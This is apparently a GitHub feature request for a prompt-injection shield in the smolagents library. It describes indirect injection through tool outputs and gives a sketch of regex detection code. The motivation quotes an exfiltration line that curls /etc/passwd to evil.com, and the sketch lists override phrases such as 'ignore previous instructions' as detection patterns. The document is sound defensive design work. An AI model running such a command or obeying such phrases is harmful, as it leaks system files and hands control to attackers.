[Feature] Native indirect prompt injection shield for tool outputs #2114

@NithiN-1808

Description

Motivation

When an agent browses the web or calls any external tool, the tool output enters
the agent's context window without any sanitization. A malicious webpage or API
response can contain hidden instructions that hijack the agent's behavior. This
is an indirect prompt injection attack.

This is especially dangerous for CodeAgent, which generates and executes real
Python code. A compromised tool output could manipulate the LLM into writing:

os.system('curl http://evil.com?data=' + open('/etc/passwd').read())

The smolagents docs already acknowledge this threat:

"An agent browsing the web could arrive on a malicious website that contains
harmful instructions"

But the only current defense is sandboxing code execution. There is no
protection against the LLM being manipulated into writing malicious code
in the first place. This affects every production smolagents deployment that
touches external data.

Proposed feature

A pluggable shields= parameter on all agents that scans every tool output
before it enters the context window.

from smolagents import CodeAgent
from smolagents.security import PatternShield, PromptGuardShield, ShieldAction

# Zero dependencies: instant regex-based detection
agent = CodeAgent(tools=[web_search], model=model, shields=[PatternShield()])

# ML-based: Meta's Llama Prompt Guard 2 (pip install smolagents[shield])
agent = CodeAgent(tools=[web_search], model=model, shields=[PromptGuardShield()])

# Three actions available
PatternShield(action=ShieldAction.BLOCK)     # raise InjectionDetectedError
PatternShield(action=ShieldAction.SANITIZE)  # strip injection, agent continues
PatternShield(action=ShieldAction.WARN)      # log warning, agent continues
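
To make the three actions concrete, here is a rough standalone sketch of how a regex-based check could behave. It does not import smolagents and is not the implementation mentioned in this issue: the function scan_tool_output, the pattern list, and the "[removed]" placeholder are all assumptions made for illustration, and the two patterns are far from a complete rule set.

```python
import logging
import re
from enum import Enum

logger = logging.getLogger(__name__)


class ShieldAction(Enum):
    BLOCK = "block"
    SANITIZE = "sanitize"
    WARN = "warn"


class InjectionDetectedError(Exception):
    """Raised when a check in BLOCK mode flags a tool output."""


# Illustrative patterns only (assumption); a real list would be much broader.
INJECTION_PATTERNS = [
    re.compile(r"ignore (all )?(previous|prior) instructions[^.\n]*", re.IGNORECASE),
    re.compile(r"you are now [^.\n]*", re.IGNORECASE),
]


def scan_tool_output(text: str, action: ShieldAction = ShieldAction.BLOCK) -> str:
    """Hypothetical helper: check one tool output and apply the chosen action."""
    hits = [m.group(0) for p in INJECTION_PATTERNS for m in p.finditer(text)]
    if not hits:
        return text  # nothing suspicious, pass the output through unchanged
    if action is ShieldAction.BLOCK:
        raise InjectionDetectedError(f"possible injection: {hits[0]!r}")
    if action is ShieldAction.SANITIZE:
        # Replace each matched span with a placeholder and keep the rest.
        for pattern in INJECTION_PATTERNS:
            text = pattern.sub("[removed]", text)
        return text
    # WARN: log the finding and return the output untouched.
    logger.warning("possible injection in tool output: %r", hits)
    return text
```

In this sketch SANITIZE removes only the matched span, so the surrounding page text still reaches the agent, while BLOCK stops the step entirely by raising.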

The design follows the same pattern as AbstractToolset: a clean ShieldBase
protocol users can subclass for custom shields (external APIs, fine-tuned
classifiers, etc.).
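
As a rough idea of what subclassing could look like, the sketch below defines a stand-in base class and one custom shield. Everything here is an assumption for illustration: the scan(tool_name, output) signature, the ClassifierShield class, and the apply_shields helper are hypothetical and may not match the interface in the actual implementation.

```python
from abc import ABC, abstractmethod
from typing import Callable, Iterable


class ShieldBase(ABC):
    """Hypothetical stand-in for the proposed base class (interface assumed)."""

    @abstractmethod
    def scan(self, tool_name: str, output: str) -> str:
        """Return the (possibly modified) output, or raise to block it."""


class ClassifierShield(ShieldBase):
    """Custom shield that delegates to any scoring function,
    e.g. an external API or a fine-tuned classifier."""

    def __init__(self, score_fn: Callable[[str], float], threshold: float = 0.5):
        self.score_fn = score_fn
        self.threshold = threshold

    def scan(self, tool_name: str, output: str) -> str:
        # Block the output when the score reaches the threshold.
        if self.score_fn(output) >= self.threshold:
            raise ValueError(f"output of {tool_name!r} flagged as injection")
        return output


def apply_shields(tool_name: str, output: str, shields: Iterable[ShieldBase]) -> str:
    """Run the output through each shield in order before it reaches the context."""
    for shield in shields:
        output = shield.scan(tool_name, output)
    return output
```

Chaining shields in order means a cheap check can run first and a slower classifier only sees outputs that passed it.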

I have a working implementation ready with 57 passing tests covering edge cases,
unicode, buried injections, and agent integration. Happy to open a PR immediately.
